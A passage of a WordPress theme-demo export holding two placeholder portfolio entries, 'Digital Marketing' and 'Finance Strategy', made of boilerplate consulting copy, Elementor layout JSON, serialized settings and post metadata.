<img src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" sizes="(max-width: 1174px) 100vw, 1174px" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" alt="" width="1174" height="620" />
<h5>01. Сhallenge</h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.
<ul>
 	<li>







































the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>







































there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
</ul>
<h5>02. Solutions</h5>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
45
<h6>corporate management</h6>
<h5>03. Results</h5>
A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.

We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.

<img src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" sizes="(max-width: 606px) 100vw, 606px" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" alt="" width="606" height="342" />
<a target="_blank" rel="noopener noreferrer">
Twitter
</a>
<a target="_blank" rel="noopener noreferrer">
Facebook-f
</a>
<a target="_blank" rel="noopener noreferrer">
Google-plus-g
</a>
<a target="_blank" rel="noopener noreferrer">
Pinterest-p
</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>837</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:16:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:16:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[838]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3be3337c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"5befbf60","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ce70032","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3f822f27","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"68851ebc","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"250ea23d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"71c341e4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6542827e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"371f6bc3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1eb0ca9d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"71f04c6a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3d3344ee","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"832149d","elType":"widget","settings":{"editor":"<p>August 14, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5342643c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f721437","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2f3d08dd","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"6b706da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63060966","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75e4e9b8","elType":"section","settings":[],"elements":[{"id":"6bda05f8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"52f0b92f","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"54d9052f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3b65fe94","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7545e3c5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"605dfd7a","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2518391b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"633f728b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4070ca87","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1792de","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7cf09702","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"27507c6a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6c19f0d0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4db11d58","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4723e5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7844df75","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d819e34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"414945e5","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"58ded439","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3c1686f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"77c59310","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5a688754","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f83c9f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6eea0e82","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2026]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[839]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[normal]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=842</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>842</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
